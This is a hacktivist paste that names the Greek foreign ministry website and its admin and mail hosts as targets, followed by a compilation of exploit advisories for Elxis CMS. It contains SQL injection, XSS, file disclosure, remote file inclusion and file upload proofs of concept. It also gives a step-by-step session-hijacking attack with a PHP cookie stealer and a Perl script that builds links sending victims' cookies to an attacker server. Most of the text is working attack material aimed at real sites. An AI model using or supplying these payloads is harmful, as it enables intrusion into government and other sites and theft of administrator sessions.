- -----------------------------------GREEK ANON ANALYTICS-----------------------------------------------
- THIS WEBSITE COST TO GREEK PEOPLE 1.2million euros IT IS THE FOREIGN AFFAIRES WEBSITE
- SITE IS BUILT WITH ELXIS CMS (FREE)http://www.elxis.org/
- ELXIS CMS IS POWERFULL BUT IT HAS SOME ISSUES BECAUSE IT IS FREE
- **WE THING THAT WITH 1.2 MILLION YOU COULD DO SOMETHING BETTER ,A CUSTOM PLATFORM THAN A FREE ONE***
- BUT SAME SHIT DIFFERENT DAY***
- IN ORDER TO PROTECT WHAT THEY CANT PROTECT WE WILL NOT PUBLISH VULNERABLE LINKS WE FOUND
- ON THE ANATOMY OF THEIR PLATFORM.
- NOTE THAT THIS SITE IS VULNERABLE TO SQLI AND XSS and MORE............................
- BUT WE MUST PROVE THAT THIS SITE DOES NOT WORTH 1.2MILLION SO...
- EXPECT JUSTICE
- -----------------------------------GREEK ANON ANALYTICS-----------------------------------------------
- www.mfa.gr/administrator
- mail.mfa.gr
- *******************************************************************************************************
- **********************************---***elxis vulnerabilities***---*************************************
- Vulnerability ID: HTB22700
- Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra
- Vendor Notification: 16 November 2010
- Vulnerability Type: SQL Injection
- Status: Fixed by Vendor
- Risk level: High
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- GET /index.php HTTP/1.1
- Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
- *******Solution: Upgrade to the most recent version***************************************************
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- POST /index.php?option=com_poll&Itemid=17 HTTP/1.1
- X_FORWARDED_FOR: 123'SQL_CODE_HERE
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 66
- voteid=1&option=com_poll&task=vote&id=1&Itemid=17&task_button=Vote
- *****Solution: Upgrade to the most recent version
- *****************************************************************************************************
- *************************************XSS VULN********************************************************
- ********************http://blip.tv/mrpr0n/elxis-2009-3-aphrodite-rev2681-session-hijacking-5490513****
- *******************************************************************************************************
- Elxis CMS Cross-site scripting (XSS)
- Vendor's description of software and download:
- # http://www.elxis.org
- Dork:
- # N/a
- Application Info:
- # elxis 2009.3 aphrodite / february 2012
- Vulnerability Info:
- # Type: XSS
- Time Table:
- # 13/02/2012 - Vendor notified
- XSS:
- #Input passed to the "i" parameter in /includes/simplepie/handler_image.php is not properly sanitised before being returned to the user.
- Solution:
- # Input validation of vulnerable parameters should be corrected.
- POC:
- http://www.elxis-demo.com/includes/simplepie/handler_image.php?i=db222055fb39%3CsCrIpT%3Ealert%281234%29%3C%2fsCrIpT%3E
- Credit:
- # Discoverd By: Maciej Gojny / Ariko-Security 2012
- 1) Input passed to the "task" parameter in index.php (when "option" is set to "com_content") is not properly
- sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a
- user's browser session in context of an affected site.
- 2) Input passed via the URL to administrator/index.php is not properly sanitised before being returned to the user.
- This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected
- site.
- ============================
- | 0×01 | XSS Vulnerabilites |
- =============================
- FrontPage Manager: (com_content)
- 1 http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_frontpage&task=&boxchecked=0&simpleview=1
- Content Items Manager: (com_frontpage)
- 1 http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&filter_pub=-3&filter_sectionid=0&catid=0&limit=20&limitstart=0&option=com_content§ionid=0&task=&boxchecked=0&hidemainmenu=0&redirect=0&simpleview=1
- Private Messages: (com_messages)
- 1 http://VICTIM_SERVER/elxis/administrator/index2.php?search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&limit=20&limitstart=0&option=com_messages&task=&boxchecked=0&hidemainmenu=0
- Menus Manager: (com_menus)
- 1 http://VICTIM_SERVER/elxis/administrator/index2.php?levellimit=1&search=%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&order%5B%5D=1&access=29&order%5B%5D=1&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=3&access=29&order%5B%5D=1&access=29&order%5B%5D=2&access=29&order%5B%5D=3&access=29&order%5B%5D=5&access=29&order%5B%5D=5&access=29&order%5B%5D=7&access=29&order%5B%5D=7&access=29&order%5B%5D=9&access=29&order%5B%5D=10&access=29&order%5B%5D=10&access=29&order%5B%5D=12&access=29&order%5B%5D=12&access=29&limit=20&limitstart=0&option=com_menus&menutype=mainmenu&task=&boxchecked=0&hidemainmenu=0
- =========================================
- | 0×02 | Session hijacking Vulnerability |
- =========================================
- Intro…
- The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
- Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.
- The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
- The session token could be compromised in different ways; the most common are:
- Predictable session token;
- Session Sniffing;
- Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
- Man-in-the-middle attack
- Man-in-the-browser attack
- Source:
- https://www.owasp.org/index.php/Session_hijacking_attack
- The 1st Step:
- Upload to the ATTACKER_SERVER:
- stealer.php – [Record the cookies of every user that views it!]
- gotit.txt – [The log file!]
- 1 //--- stealer.php ---
- 2 <?php
- 3 header ('Location:http://VICTIM_SERVER/elxis/administrator/index2.php');
- 4 $cookie = $_GET['cookie'];
- 5 $log = fopen("gotit.txt", "a");
- 6 fwrite($log, $cookie ."\n");
- 7 fclose($log);
- 8 ?>
- 9 //--- end ---
- The 2nd Step:
- Create the “evil” link (with the Elxis_2009.3_Aphrodite_rev2681.pl).
- 01 # --- Elxis_2009.3_Aphrodite_rev2681.pl ---
- 02 #!/usr/bin/perl
- 03 print "\n |==[ mr.pr0n ]=============================================== |\n";
- 04 print " | Elxis 2009.3 Aphrodite rev2681 - ..the evil link creator |\n";
- 05 print " |===================[ http://ghostinthelab.wordpress.com/ ]== |\n";
- 06
- 07 print "\nEnter the target (e.g.: http://victim.com)";
- 08 print "\n> ";
- 09 $target=;
- 10 chomp($target);
- 11 $target = "http://".$target if ($target !~ /^http:/);
- 12
- 13 print "Enter the elxis directory (e.g.: elxis)";
- 14 print "\n> ";
- 15 $dir=;
- 16 chomp($dir);
- 17
- 18 $target = $target."/".$dir;
- 19
- 20 print "Enter the address of the \"stealer.php\" (e.g.: http://attacker.com/directory/stealer.php)";
- 21 print "\n> ";
- 22 $stealer=;
- 23 chomp($stealer);
- 24
- 25 $result = "document.location=\"$stealer?cookie=\"+document.cookie\;";
- 26 $result =~ s/(.)/sprintf("%x%",ord($1))/eg;
- 27
- 28 print "\n[+] Send this link to your victim...\n\n";
- 29 print $target."/administrator/index2.php?option=com_frontpage&search='\">%".$result."3b\n";
- 30 #--- end ---
- The 3rd Step:
- Send the “evil” link to the administrator….
- WARNING : The administrator *MUST* be logged in.
- The 4th Step:
- Go to http://VICTIM_SERVER/elxis/administrator/
- Insert into your cookie the hijacked session.
- Go to http://VICTIM_SERVER/elxis/administrator/index2.php
- …..Welcome administrator :-)
- *****************************************************************************************************
- *****************************************************************************************************
- ########################################################################
- #Elxis CMS Local File Disclosure Vulnerability
- #Script Site : http://www.elxis.org
- ########################################################################
- #
- #Code : <?php
- #
- # line 639 Header("Content-Type: ".$this->contentType."; charset=".$this->encoding);
- # line 640 Header("Content-Disposition: inline; filename=".basename($filename));
- # line 641 readfile($filename, "r");
- # line 642 die();
- # ?>
- #PoC : http://[target]/[path]/includes/feedcreator.class.php?filename=../../../../../../etc/passwd
- #
- #
- #
- ########################################################################
- ########################################################################
- ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
- ########################################################################
- ########################################################################
- ?
- Vulnerability ID: HTB22700
- Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra
- Vendor Notification: 16 November 2010
- Vulnerability Type: SQL Injection
- Status: Fixed by Vendor
- Risk level: High
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- GET /index.php HTTP/1.1
- Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
- Solution: Upgrade to the most recent version
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- POST /index.php?option=com_poll&Itemid=17 HTTP/1.1
- X_FORWARDED_FOR: 123'SQL_CODE_HERE
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 66
- voteid=1&option=com_poll&task=vote&id=1&Itemid=17&task_button=Vote
- Solution: Upgrade to the most recent version
- Elxis CMS 2009.2 suffers from a remote SQL injection vulnerability.
- High-Tech Bridge ./Elxis CMS 2009.2 SQL Injection Vulnerabilities ( php)
- ?
- Vulnerability ID: HTB22700
- Reference: http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra
- Vendor Notification: 16 November 2010
- Vulnerability Type: SQL Injection
- Status: Fixed by Vendor
- Risk level: High
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in usercookie[password] variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- GET /index.php HTTP/1.1
- Cookie: usercookie[username]=username; usercookie[password]=123'SQL_CODE_HERE
- Solution: Upgrade to the most recent version
- Vulnerability Details:
- The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in X_FORWARDED_FOR variable.
- Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- The following PoC is available:
- POST /index.php?option=com_poll&Itemid=17 HTTP/1.1
- X_FORWARDED_FOR: 123'SQL_CODE_HERE
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 66
- voteid=1&option=com_poll&task=vote&id=1&Itemid=17&task_button=Vote
- Solution: Upgrade to the most recent version
- n0n0x/Elxis CMS 2009.2 Remote File Inclusion ( na)
- ?
- ###############################################
- # _______ _______ #
- # _______ __ __ \_______ __ __ \____ __ #
- # __ _ \_ / / /__ __ \_ / / /__ |/_/ #
- # _ / / // /_/ / _ / / // /_/ / __> < #
- # /_/ /_/ \____/ /_/ /_/ \____/ /_/|_| #
- # #
- # priasantai.uni.cc | team-elite.us #
- ###############################################
- #######################################################
- #
- # elxis_2009.2_electra_rev2631 <=== multiple Remote File Include
- #
- #######################################################
- # Author : n0n0x
- #
- # Homepage: http://priasantai.uni.cc/
- #
- # Download script : http://www.elxis-downloads.com/downloads/elxis-cms/272.html
- #######################################################
- file : index.php
- http://site.com/elxis-cms/index.php?mosConfig_absolute_path=[shell script]
- c0de :
- require_once('configuration.php');
- if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
- if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
- if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
- include($mosConfig_absolute_path.'/includes/systemplates/router.php');
- exit();
- }
- require_once($mosConfig_absolute_path.'/includes/Core/loader.php');
- file : index2.php
- http://site.com/elxis-cms/index2.php?mosConfig_absolute_path=[shell script]
- c0de :
- require_once('configuration.php');
- $mosConfig_gzip = '0'; //gzip makes seo title suggestion feature to stop working
- if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
- if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
- if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
- include($mosConfig_absolute_path.'/includes/systemplates/router.php');
- exit();
- }
- require_once( $mosConfig_absolute_path.'/includes/Core/loader.php' );
- file : index.php
- http://site.com/elxis-cms/administrator/index.php?str_replace=[shell script]
- c0de :
- /** Set flag that this is a parent file */
- define( '_VALID_MOS', 1 );
- define( '_ELXIS_ADMIN', 1 );
- $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
- require_once($elxis_root.'/includes/Core/security.php');
- if (!file_exists($elxis_root.'/configuration.php')) {
- header('Location: ../installation/index.php');
- exit();
- }
- require_once($elxis_root.'/configuration.php');
- require_once($elxis_root.'/includes/Core/loader.php');
- file : index2.php
- http://site.com/elxis-cms/administrator/index2.php?str_replace=[shell script]
- http://site.com/elxis-cms/administrator/index2.php?mosConfig_absolute_path=[shell script]
- c0de :
- define( '_VALID_MOS', 1 );
- define( '_ELXIS_ADMIN', 1 );
- $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
- require_once($elxis_root.'/includes/Core/security.php');
- if (!file_exists($elxis_root.'/configuration.php' )) {
- header("Location: ../installation/index.php");
- exit();
- }
- require_once($elxis_root.'/configuration.php');
- require_once($elxis_root.'/includes/Core/loader.php');
- require_once($mosConfig_absolute_path.'/administrator/includes/admin.php');
- #######################################################
- # Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org - team-elite.us
- #
- # friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
- # devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
- #
- # chats : irc.auzs.net 6667-7000 #exploit-db
- ######################################################
- Elxis CMS version 2009.2 suffers from a remote file inclusion vulnerability.
- Ewerson Guimaraes/Elxis CMS 2009.3 Aphrodite Cross Site Scripting ( na)
- ?
- [Discussion]
- - DcLabs Security Research Group advises about the following vulnerability(ies):
- [Software]
- - Elxis CMS
- [Vendor Product Description]
- - Elxis is powerful open source content management system (CMS)
- released for free under the GNU/GPL license. It has unique
- multi-lingual features, it follows W3C standards, it is secure,
- flexible, easy to use, and modern. The development team, Elxis Team,
- paid extra attention to the optimization of the CMS for the search
- engines and this lead to high performance of all elxis powered web
- sites and to high ranking in search engines results.
- - Site: http://www.elxis.org/
- [Advisory Timeline]
- - 11/22/2011 -> First Contact requesting security department contact;
- - 11/22/2011 -> Vendor responded;
- - 11/23/2011 -> Advisory sent to vendor;
- - 11/23/2011 -> Vendor reply, fix the bug, release patch and
- coordinate to publish.
- - 12/05/2011 -> Published.
- [Bug Summary]
- - Persistent/Stored Cross-Site Scripting (XSS) (The cms admin can edit
- user contact info with XSS codes)
- - Non-Persistent Cross-Site Scripting (XSS)
- [Impact]
- - High
- [Affected Version]
- - Elxis 2009.3 aphrodite
- [Bug Description and Proof of Concept]
- - Exploiting the HTML-injection issue allows an attacker to execute
- HTML and Java Script code in the remote user context to steal
- cookie-based authentication credentials or to control how the site is
- rendered to the user; other attacks may also be possible.
- - Moreover, Cross Site Scripting (XSS) vulnerabilities are caused due
- to lack of input validation. This allows malicious people to inject
- arbitrary HTML and script code. More info at:
- http://en.wikipedia.org/wiki/Cross-site_scripting
- POC
- /elxis/index.php?id=3&Itemid=9&option=com_content&task=%22%20onmouseover%3dprompt%28dclabs%29%20dcl%3d%22
- /elxis/administrator/index.php/%22onmouseover=prompt(dclabs)%3E
- All flaws described here were discovered and researched by:
- Ewerson Guimaraes aka Crash
- DcLabs Security Research Group
- crash (at) dclabs <dot> com <dot> br
- [Patch(s) / Workaround]
- http://forum.elxis.org/index.php?PHPSESSID=v9i7kgmmb2554ldmlcmbj32ugjd0ngpc&topic=5144.msg43327#msg43327
- [Greetz]
- DcLabs Security Research Group.
- --
- Ewerson Guimaraes (Crash)
- Pentester/Researcher
- DcLabs Security Team
- www.dclabs.com.br
- Elxis CMS version 2009.3 Aphrodite suffers from a cross site scripting vulnerability.
- Demetris Papapetrou/Elxis CMS eForum 1.1 File Upload ( na)
- ?
- ==========================================================================
- Elxis CMS component eForum v1.1 - Arbitary File Upload Vulnerability
- ==========================================================================
- Software: eForum v1.1 (Elxis CMS component)
- Vendor: http://www.isopensource.com/
- Vuln Type: Arbitary File Upload
- Remote: Yes
- Local: No
- Discovered by: QSecure and Demetris Papapetrou
- Website: http://www.qsecure.com.cy
- Discovered: 09/03/2011
- Reported: 06/04/2011
- Fixed: 07/04/2011 (eForum v1.1 patched)
- Disclosed: 09/04/2011
- Vendor's Response: http://forum.elxis.org/index.php?topic=5144.msg39714#msg39714
- Vulnerability Reference: http://www.qsecure.com.cy/advisories/arbitary_file_upload_in_elxis_cms_eforum.html
- VULNERABILITY DESCRIPTION:
- ==========================
- The script "/eforum.php" is prone to an arbitrary file-upload vulnerability because it fails to properly filter dangerous file extensions.
- An attacker can exploit this issue to upload an arbitrary remote file (e.g. .phtml) containing malicious PHP code and to execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system.
- VULNERABILITY DETAILS:
- ======================
- Form Details:
- --------------
- Id: eforumpostform
- Name: eforumpostform
- Method: POST
- Action: http://host/path_to_elxis_cms/index2.php
- INDEX NAME TYPE VALUE
- 0 title text Re:Test Port
- 1 icon select
- 2 btncolor select
- 3 message textarea test
- 4 notify checkbox 1
- 5 efattachment[] file /tmp/phpinfo.phtml
- 6 eftplurl hidden http://host/path_to_elxis_cms/components/com_eforum/template/blue
- 7 option hidden com_eforum
- 8 task hidden save
- 9 bid hidden 2
- 10 parent hidden 5
- 11 id hidden 0
- Arbitrary File Upload Location:
- -------------------------------
- http://host/path_to_elxis_cms/components/com_eforum/upload/
- Vulnerable Code:
- ----------------
- File Location: /path_to_elxis_cms/components/com_eforum/
- File Name: eforum.php
- [code]
- if (isset($_FILES)) { //upload attachments
- if (isset($_FILES['efattachment']) && is_array($_FILES['efattachment']) && isset($_FILES['efattachment']['name']) && (count($_FILES['efattachment']['name']) > 0)) {
- $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess'); <-- File extensions filter
- $uploaddir = $eforum->path.'/upload';
- $upfiles = $_FILES['efattachment'];
- foreach ($upfiles['name'] as $idx => $upname) {
- if ($upname != '') {
- $source = $upfiles['tmp_name'][$idx];
- if (is_uploaded_file($source)) {
- if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }
- [/code]
- Elxis CMS eForum component version 1.1 suffers from an arbitrary file upload vulnerability.
- n0n0x/Elxis CMS 2009.2 Remote file include vulnerbility ( php)
- ?
- ###############################################
- # _______ _______ #
- # _______ __ __ \_______ __ __ \____ __ #
- # __ _ \_ / / /__ __ \_ / / /__ |/_/ #
- # _ / / // /_/ / _ / / // /_/ / __> < #
- # /_/ /_/ \____/ /_/ /_/ \____/ /_/|_| #
- # #
- # priasantai.uni.cc | team-elite.us #
- ###############################################
- #######################################################
- #
- # elxis_2009.2_electra_rev2631 <=== multiple Remote File Include
- #
- #######################################################
- # Author : n0n0x
- #
- # Homepage: http://priasantai.uni.cc/
- #
- # Download script : http://www.elxis-downloads.com/downloads/elxis-cms/272.html
- #######################################################
- file : index.php
- http://site.com/elxis-cms/index.php?mosConfig_absolute_path=[shell script]
- c0de :
- require_once('configuration.php');
- if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
- if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
- if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
- include($mosConfig_absolute_path.'/includes/systemplates/router.php');
- exit();
- }
- require_once($mosConfig_absolute_path.'/includes/Core/loader.php');
- file : index2.php
- http://site.com/elxis-cms/index2.php?mosConfig_absolute_path=[shell script]
- c0de :
- require_once('configuration.php');
- $mosConfig_gzip = '0'; //gzip makes seo title suggestion feature to stop working
- if (file_exists($mosConfig_absolute_path.'/installation/index.php')) {
- if (!defined('_ELXIS_SYSALERT')) { define('_ELXIS_SYSALERT', 3); }
- if (!defined('_ELXIS_SYSALERT_MSG')) { define('_ELXIS_SYSALERT_MSG', 'Please delete the <strong>installation</strong> folder.'); }
- include($mosConfig_absolute_path.'/includes/systemplates/router.php');
- exit();
- }
- require_once( $mosConfig_absolute_path.'/includes/Core/loader.php' );
- file : index.php
- http://site.com/elxis-cms/administrator/index.php?str_replace=[shell script]
- c0de :
- /** Set flag that this is a parent file */
- define( '_VALID_MOS', 1 );
- define( '_ELXIS_ADMIN', 1 );
- $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
- require_once($elxis_root.'/includes/Core/security.php');
- if (!file_exists($elxis_root.'/configuration.php')) {
- header('Location: ../installation/index.php');
- exit();
- }
- require_once($elxis_root.'/configuration.php');
- require_once($elxis_root.'/includes/Core/loader.php');
- file : index2.php
- http://site.com/elxis-cms/administrator/index2.php?str_replace=[shell script]
- http://site.com/elxis-cms/administrator/index2.php?mosConfig_absolute_path=[shell script]
- c0de :
- define( '_VALID_MOS', 1 );
- define( '_ELXIS_ADMIN', 1 );
- $elxis_root = str_replace('/administrator', '', str_replace(DIRECTORY_SEPARATOR, '/', dirname(__FILE__)));
- require_once($elxis_root.'/includes/Core/security.php');
- if (!file_exists($elxis_root.'/configuration.php' )) {
- header("Location: ../installation/index.php");
- exit();
- }
- require_once($elxis_root.'/configuration.php');
- require_once($elxis_root.'/includes/Core/loader.php');
- require_once($mosConfig_absolute_path.'/administrator/includes/admin.php');
- #######################################################
- # Greetz: all member | manadocoding.org - sekuritiOnline.net - h4ckb0x.org - team-elite.us
- #
- # friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, opa, xoron, pitch, thama, s0ny,
- # devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet.
- #
- # chats : irc.auzs.net 6667-7000 #exploit-db
- ######################################################
- High-Tech Bridge SA/Elxis CMS 2009.2 Electra Rev2631 Cross Site Scripting / SQL Injection ( na)
- ?
- ====================================
- Vulnerability ID: HTB22613
- Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_elxis_cms.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
- Vendor Notification: 20 September 2010
- Vulnerability Type: SQL Injection
- Status: Fixed by Vendor
- Risk level: Low
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- The vulnerability exists due to failure in the "administrator/components/com_content/admin.content.php" script to properly sanitize user-supplied input in "id" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
- Attacker can use browser to exploit this vulnerability. The following PoC is available:
- http://host/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c
- Solution: Upgrade to the most recent version
- ====================================
- Vulnerability ID: HTB22614
- Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
- Vendor Notification: 20 September 2010
- Vulnerability Type: XSS (Cross Site Scripting)
- Status: Fixed by Vendor
- Risk level: Medium
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- User can execute arbitrary JavaScript code within the vulnerable application.
- The vulnerability exists due to failure in the "administrator/components/com_users/admin.users.php" script to properly sanitize user-supplied input in "search" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
- An attacker can use browser to exploit this vulnerability. The following PoC is available:
- <form action="http://host/administrator/index2.php" method="post" name="main" >
- <input type="hidden" name="search" value='1"><script>alert(document.cookie)</script>' />
- <input type="hidden" name="filter_logged" value="0" />
- <input type="hidden" name="filter_enabled" value="-1" />
- <input type="hidden" name="filter_type" value="Super Administrator" />
- <input type="hidden" name="filter_expired" value="-1" />
- <input type="hidden" name="limit" value="20" />
- <input type="hidden" name="limitstart" value="0" />
- <input type="hidden" name="option" value="com_users" />
- <input type="hidden" name="task" value="" />
- <input type="hidden" name="boxchecked" value="0" />
- <input type="hidden" name="hidemainmenu" value="0" />
- </form>
- <script>
- document.main.submit();
- </script>
- Solution: Upgrade to the most recent version
- ====================================
- Vulnerability ID: HTB22615
- Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html
- Product: Elxis CMS
- Vendor: Elxis Team ( http://www.elxis.org/ )
- Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
- Vendor Notification: 20 September 2010
- Vulnerability Type: XSS (Cross Site Scripting)
- Status: Fixed by Vendor
- Risk level: Medium
- Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
- Vulnerability Details:
- User can execute arbitrary JavaScript code within the vulnerable application.
- The vulnerability exists due to failure in the "administrator/index2.php" script to properly sanitize user-supplied input in "misc" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
- An attacker can use browser to exploit this vulnerability. The following PoC is available:
- <form action="http://eecore/elxis/administrator/index2.php" method="post" name="main" >
- <input type="hidden" name="catid" value="1" />
- <input type="hidden" name="user_id" value="0" />
- <input type="hidden" name="name" value="My Name" />
- <input type="hidden" name="seotitle" value="sef-url" />
- <input type="hidden" name="con_position" value="Website manager" />
- <input type="hidden" name="email_to" value="webmaster@example.com" />
- <input type="hidden" name="address" value="My address" />
- <input type="hidden" name="suburb" value="city" />
- <input type="hidden" name="state" value="reg" />
- <input type="hidden" name="country" value="country" />
- <input type="hidden" name="postcode" value="12345" />
- <input type="hidden" name="telephone" value="123" />
- <input type="hidden" name="fax" value="123" />
- <input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' />
- <input type="hidden" name="default_con" value="1" />
- <input type="hidden" name="published" value="1" />
- <input type="hidden" name="ordering" value="1" />
- <input type="hidden" name="access" value="29" />
- <input type="hidden" name="image" value="asterisk.png" />
- <input type="hidden" name="params[menu_image]" value="-1" /><input type="hidden" name="params[menu_image_only]" value="0" /><input type="hidden" name="params[pageclass_sfx]" value="" /><input type="hidden" name="params[print]" value="" /><input type="hidden" name="params[back_button]" value="" /><input type="hidden" name="params[name]" value="1" /><input type="hidden" name="params[position]" value="1" /><input type="hidden" name="params[email]" value="0" /><input type="hidden" name="params[street_address]" value="1" /><input type="hidden" name="params[suburb]" value="1" /><input type="hidden" name="params[state]" value="1" /><input type="hidden" name="params[country]" value="1" /><input type="hidden" name="params[postcode]" value="1" /><input type="hidden" name="params[telephone]" value="1" /><input type="hidden" name="params[fax]" value="1" /><input type="hidden" name="params[misc]" value="1" /><input type="hidden" name="params[vcard]" value="1" /><input type="hidden" name=!
- "params[image]" value="1" /><input type="hidden" name="params[email_description]" value="1" /><input type="hidden" name="params[email_description_text]" value="" /><input type="hidden" name="params[email_form]" value="1" /><input type="hidden" name="params[email_copy]" value="1" /><input type="hidden" name="params[drop_down]" value="0" /><input type="hidden" name="params[contact_icons]" value="1" /><input type="hidden" name="params[icon_address]" value="" /><input type="hidden" name="params[icon_email]" value="" /><input type="hidden" name="params[icon_telephone]" value="" /><input type="hidden" name="params[icon_fax]" value="" /><input type="hidden" name="params[icon_misc]" value="" />
- <input type="hidden" name="option" value="com_contact" />
- <input type="hidden" name="id" value="1" />
- <input type="hidden" name="task" value="save" />
- </form>
- <script>
- document.main.submit();
- </script>
- Solution: Upgrade to the most recent version
- ====================================
- Vulnerability ID: HTB22616
- Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_polls_module.html
- Product: Elxis CMS
